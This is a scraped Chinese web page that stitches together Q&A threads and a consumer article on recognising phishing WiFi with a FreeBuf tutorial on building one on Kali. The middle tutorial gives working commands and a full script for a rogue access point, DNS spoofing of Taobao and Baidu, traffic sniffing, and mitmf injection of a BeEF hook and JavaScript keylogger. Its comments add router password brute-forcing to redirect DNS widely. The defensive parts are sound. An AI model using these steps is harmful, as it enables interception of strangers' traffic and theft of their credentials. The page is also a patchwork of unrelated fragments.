如何辨别手机版wifi钓鱼器WiFi?没有密码的都是手机版wifi钓鱼器WiFi吗?如果不小心连接了手机版wifi钓鱼器WiFi应该怎么处理?

多品类齐全,轻松购物
快多仓直发,极速配送
好正品行货,精致服务
省天天低价,畅选无忧不慎连接上钓鱼wifi怎么办_百度知道
不慎连接上钓鱼wifi怎么办
断开就可以了吗?
我有更好的答案
断开就行了。用杀毒软件查查,看你的设备里面有没有被安装其他软件望采纳
采纳率:88%
来自团队:
为您推荐:
其他类似问题
您可能关注的内容
wifi的相关知识
换一换
回答问题,赢新手礼包
个人、企业类
违法有害信息,请在下方选择后提交
色情、暴力
我们会通过消息、邮箱等方式尽快将举报结果通知您。如何识别钓鱼WIFI信号_百度知道
如何识别钓鱼WIFI信号
我有更好的答案
  钓鱼WIFI信号识别方法:  第一招 拒绝来源不明的WiFi  正如“妖妃娘娘”所披露的那样,设置钓鱼WiFi陷阱的黑客大多利用的是用户想要免费蹭网的占便宜心理。因此要想避免堕入类似陷阱,首先要做到的就是尽量不要使用来源不明的WiFi,尤其是免费又不需密码的WiFi。如果是在星巴克、麦当劳这样有商家提供免费WiFi网络的地方,用户也要多留一个心眼,主动向商家询问其提供的WiFi的具体名称,以免在选择WiFi热点接入时不小心连接到黑客搭建的名称类似的钓鱼WiFi。  第二招 及时更新升级浏览器  和传统有线网络相比,WiFi网络环境下,用户信息的安全性挑战更多。用户在使用非加密的WiFi网络或者陌生的WiFi网络时,最好提前在笔记本电脑或智能手机中安装一些安全防范软件以作提防。  针对最容易泄露用户信息的浏览器软件,用户除了要在官方网站进行下载的和安装之外,还要养成定时更新升级的好习惯。例如此前提到的UC浏览器,其最新的版本就加入了连接到无密码的WiFi网络自动提醒用户是否要断开的功能,这种功能升级对于用户防范钓鱼WiFi无疑会起到比较实用的效果。  使用浏览器登录网站时,如果碰到需要用户输入账户名和密码并弹出“是否记住密码”选项框的情况,最好不要选择“记住密码”,因为“记住密码”功能会将用户的账号信息存储到浏览器的缓存文件夹中,无形中方便了黑客进行窃取。  第三招 手机软件设置莫偷懒  针对智能手机用户尤其需要提醒的是,在日常使用时最好关闭WiFi自动连接这项功能。因为如果这项功能打开的话,手机在进入有WiFi网络的区域就会自动扫描并连接上不设密码的WiFi网络,这无疑会大大增加用户误连钓鱼WiFi的几率,为了一时方便而留下安全隐患,未免有些得不偿失。  另外,用户在使用智能手机登录手机银行或者支付宝、财付通的金融服务类网站时,最好不要直接通过手机浏览器进行,请优先考虑使用银行或者第三方支付公司推出的专用应用程序,这些程序的安全性要比开放的手机浏览器高上不少。
下载一个160wifi,很安全,不熟悉的设备可以拉黑
为您推荐:
其他类似问题
您可能关注的内容
wifi的相关知识
换一换
回答问题,赢新手礼包
个人、企业类
违法有害信息,请在下方选择后提交
色情、暴力
我们会通过消息、邮箱等方式尽快将举报结果通知您。利用Kali进行WiFi钓鱼测试实战 - FreeBuf互联网安全新媒体平台 | 关注黑客与极客
利用Kali进行WiFi钓鱼测试实战
共2579181人围观
,发现 62 个不明物体
文中提及的部分技术可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用。请不要做一只咖啡馆里安静的猥琐大叔。
从至少一年前我就一直想在自己跑kali的笔记本上架个钓鱼热点。然而由于网上的教程的nat写得有问题,别人写好的脚本和我电脑有些互不待见,最接近成功的一次只做到了qq能聊天,百度都上不去。
而最近忽然意识到了问题的所在,成功实现了建立wifi热点,dns劫持,js注入,图片嗅探,和BEEF结合对用户浏览器进行攻击测试。
故写此文分享给大家,希望与之前的我有一样困惑的同志们能有所收获。
工具:isc-dhcp-server& ;Aircrack-ng套件;iptables
建立过程:
首先写dhcp配置文件/etc/dhcp/dhcpd.conf
写入如下内容:
default-lease-time&700;
max-lease-time&8000;
subnet&10.0.0.0&netmask&255.255.255.0&{
option&routers&10.0.0.1;
option&subnet-mask&255.255.255.0;
option&domain-name-servers&10.0.0.1;
range&10.0.0.10&10.0.0.100;
这里以10.0.0.1作为网关和dns服务器地址。
然后我们处理无线网卡
ifconfig&wlan1&down&&&&&&&&&&&#wlan1修改成你的网卡
iwconfig&wlan1&mode&monitor
ifconfig&wlan1&up
airmon-ng&start&wlan1
上述命令可以防止出现:Error: Got channel -1, expected a value & 0.
然后用airbase建立热点
airbase-ng&-e&Fishing&-c&11&mon0
热点的网络流量会被虚拟到at0这块网卡上面
ifconfig&at0&up
ifconfig&at0&10.0.0.1&netmask&255.255.255.0
route&add&-net&10.0.0.0&netmask&255.255.255.0&gw&10.0.0.1
打开ip转发
echo&1&&&/proc/sys/net/ipv4/ip_forward
dhcpd&-cf&/etc/dhcp/dhcpd.conf&-pf&/var/run/dhcpd.pid&at0
service&isc-dhcp-server&start
然后可以试着用手机连接,应该可以连上但上不了网
于是配置NAT
iptables&-t&nat&-A&POSTROUTING&-o&eth0&-j&MASQUERADE&#对eth0进行源nat
iptables&-A&FORWARD&-i&wlan1&-o&eth0&-j&ACCEPT&#把无线网卡流量转发到有线网卡(或者什么能上网的网卡)上面
iptables&-A&FORWARD&-p&tcp&--syn&-s&10.0.0.0/24&-j&TCPMSS&--set-mss&1356&#修改最大报文段长度
注意那第三个命令调整MSS,不加后果很严重(我就一直死在这里)
(这里可能还是DNS错误,请看后文中的dns代理服务器搭建)
工具:dnschef
dnschef&-i&10.0.0.1&--nameserver&210.73.64.1#53
上述命令是以ip10.0.0.1(上文中的fakeap网关和DNS的ip)建立dns,对于所有请求转发到210.73.64.1进行解析。显然这只是个“代理”并没有劫持的功效
于是我们进化:
dnschef&--fakedomains=taobao.com,baidu.com&--fakeip=10.0.0.1&-i&10.0.0.1&--nameserver&210.73.64.1#53
把淘宝和百度解析到本机了。
当然可以把更多规则写在文件里:
剩下的大家自由发挥吧。
p.s:这个和后文中mitmf冲突,mitmf识别http协议中的目的主机,进行转发,不受这个dns伪造影响。
这是一个很好玩的功能
工具:driftnet
driftnet&-i&at0
然后程序会打开一个小窗口显示所有传输的图片:
单击图片保存到/
当然可以开启&Adjunct mode:
driftnet&-i&at0&-a
直接保存图片并显示文件名。
劫持Web流量
这个更好玩
工具:BEEF;iptables
先把80端口的流量劫持走(这里10000是mitmf默认监听端口)
iptables&-t&nat&-A&PREROUTING&-p&tcp&--destination-port&80&-j&REDIRECT&--to-port&10000
然后打开mitmf
mitmf&-i&at0&--replace&--search-str&aaaaa&&--replace-str&bbbbb#把所有网页中的aaaaa替换成bbbbb
上图百度了aaaaa
好吧不要恶作剧了,上干货
mitmf&-i&at0&--inject&--js-url&http://10.0.0.1:3000/hook.js&--jskeylogger
mitmf在这里注入了js键盘记录器
和beef的攻击测试脚本,其余的攻击方式(比如javapwn)可以参考
最后用BEEF测试用户浏览器吧!
/usr/share/beef-xss/beef
浏览器打开http://127.0.0.1:3000/ui/panel ,初始用户名和密码都是beef
BEEF过于高深我还没玩得很清楚请大家自行探索。对了,不要忘了抓包
最后是我写的脚本
#清空iptables
iptables&-t&nat&-F
iptables&-t&nat&-X&&
iptables&-t&nat&-P&PREROUTING&ACCEPT&&
iptables&-t&nat&-P&POSTROUTING&ACCEPT&&
iptables&-t&nat&-P&OUTPUT&ACCEPT&&
iptables&-t&mangle&-F&&
iptables&-t&mangle&-X&&
iptables&-t&mangle&-P&PREROUTING&ACCEPT&&
iptables&-t&mangle&-P&INPUT&ACCEPT&&
iptables&-t&mangle&-P&FORWARD&ACCEPT&&
iptables&-t&mangle&-P&OUTPUT&ACCEPT&&
iptables&-t&mangle&-P&POSTROUTING&ACCEPT&&
iptables&-F&&
iptables&-X&&
iptables&-P&FORWARD&ACCEPT&&
iptables&-P&INPUT&ACCEPT&&
iptables&-P&OUTPUT&ACCEPT&&
iptables&-t&raw&-F&&
iptables&-t&raw&-X&&
iptables&-t&raw&-P&PREROUTING&ACCEPT&&
iptables&-t&raw&-P&OUTPUT&ACCEPT&&
airmon-ng&stop&mon0
ifconfig&wlan1&down&&&&&&&&&&&#wlan1修改成你的网卡
iwconfig&wlan1&mode&monitor
ifconfig&wlan1&up
airmon-ng&start&wlan1&&
sleep&2&&&&&&&&&&&&&&&&&&
gnome-terminal&-x&bash&-c&&airbase-ng&-e&Fishing&-c&11&mon0&&&&&&&&&&&&&&&#按需求修改
ifconfig&at0&up
ifconfig&at0&10.0.0.1&netmask&255.255.255.0
ifconfig&at0&mtu&1400
route&add&-net&10.0.0.0&netmask&255.255.255.0&gw&10.0.0.1
echo&1&&&/proc/sys/net/ipv4/ip_forward
dhcpd&-cf&/etc/dhcp/dhcpd.conf&-pf&/var/run/dhcpd.pid&at0
/etc/init.d/isc-dhcp-server&start&
iptables&-t&nat&-A&POSTROUTING&-o&eth0&-j&MASQUERADE
iptables&-A&FORWARD&-i&wlan1&-o&eth0&-j&ACCEPT
iptables&-A&FORWARD&-p&tcp&--syn&-s&10.0.0.0/24&-j&TCPMSS&--set-mss&1356
iptables&-t&nat&-A&PREROUTING&-p&tcp&--destination-port&80&-j&REDIRECT&--to-port&10000
gnome-terminal&-x&bash&-c&&dnschef&-i&10.0.0.1&--nameserver&210.73.64.1#53&
#打开beef并进行80js键盘记录
gnome-terminal&-x&bash&-c&&mitmf&-i&at0&--inject&--js-url&http://10.0.0.1:3000/hook.js&--jskeylogger&
*作者:piece of the past(),本文属FreeBuf原创奖励计划,未经许可禁止转载
千秋邈矣独留我,百战归来再读书
:smile: 根据这里http://xiao106347.blog.163.com/blog/static//搭建过钓鱼劫持的,用手机连上测试能嗅到网页输入的密码,但是感觉数度太慢,经常掉线,并且开启热点时候,必须插网线,不然不能上网,也就是,无线网卡和有线网卡需要同时工作,所以,如果说在麦当劳这些搞钓鱼的话,没有网线,直接用无线的话,基本不怎么行--------------是我不行,大牛估计行 :!:
Put the gun down
涨姿势 :mrgreen:
楼主一定没玩过airssl.shhttps://raw.githubusercontent.com/fastlorenzo/tools/29aafb9bb6ef5b06fab5d30c75ce/pentest/wireless/airssl/airssl.sh
@ 夜尽天明
两个无线网卡不就可以了,一个钓鱼,一个用来接受钓鱼的流量转发上网。
如果用dns欺骗,可以用全网路由器密码爆破,登录路由器后台,修改里面的dns到你公网的dns服务器,自己搭建个带hook.js的baidu钓鱼,何止黑一个无线局域网
必须您当前尚未登录。
必须(保密)
天苍苍,野茫茫,路漫漫
关注我们 分享每日精选文章
可以给我们打个分吗?&&&&公共场合WiFi虽好&要小心钓鱼WiFi&&&&现在无论国内外,在公共场合一般都有供人们接入。尤其是在火车站、机场等人流密集的地方,对WiFi的需求也很大。在开心上网打发等车、候机的时间时,我们也要小心不要连接钓鱼WiFi。要知道,危险无处不在,正当我们醉心于长假的玩乐时,自己的个人信息很有可能被盗取了。一些发达的城市在公共场合一般都会提供免费WiFi&&&&这些不法分子在咖啡厅、购物中心等人群聚集的场合,设立一个无需密码就可以连接的WiFi网络。而网络名称则与商户官方、购物中心官方的免费WiFi名称一样,从而吸引上网者连接,一般人很难分辨出它的真假。一旦连接上钓鱼WiFi,我们的个人隐私将毫无保留的展露在不法分子面前。尤其是进行支付、购物等操作时,不仅泄露了支付信息,还会泄露自己的姓名、家庭住址等隐私信息。谨慎连接免费WiFi&&&还记得有个女的在麦当劳门口举牌子,说自己的连上麦当劳的WiFi,结果个人信息和网银全部被盗的事件吗?根据权威报告显示,信息安全组织在“北上广”三地的公共场所对6万多个WiFi热点进行了调查,结果显示这其中有8.5%的WiFi热点是钓鱼WiFi。这些钓鱼WiFi不需要进行安全验证就可以免费使用,但是它们会盗取用户的个人信息和设备信息,想方设法的植入恶意并对用户进行欺诈,盗取用户的个人信息和个人财产。&一些地区的免费WiFi速率也不错&&&&如果自己可以鉴别免费WiFi的真伪,那么连接也无妨。不过出门在外,小心为上,还是尽量不要连接免费的WiFi为好。如果有可能,可以根据提示或者与商家核实是否是他们自己的真WiFi。如果流量够用,优先使用手机流量或者自带的随身WiFi。长假出游WiFi不离身,让出游拥有更好的体验!&&&&&&&&&&&&&&&
提示:支持键盘“← →”键翻页
路由器交换机无线路由无线AP

我要回帖

更多关于 WiFi钓鱼 的文章

 

随机推荐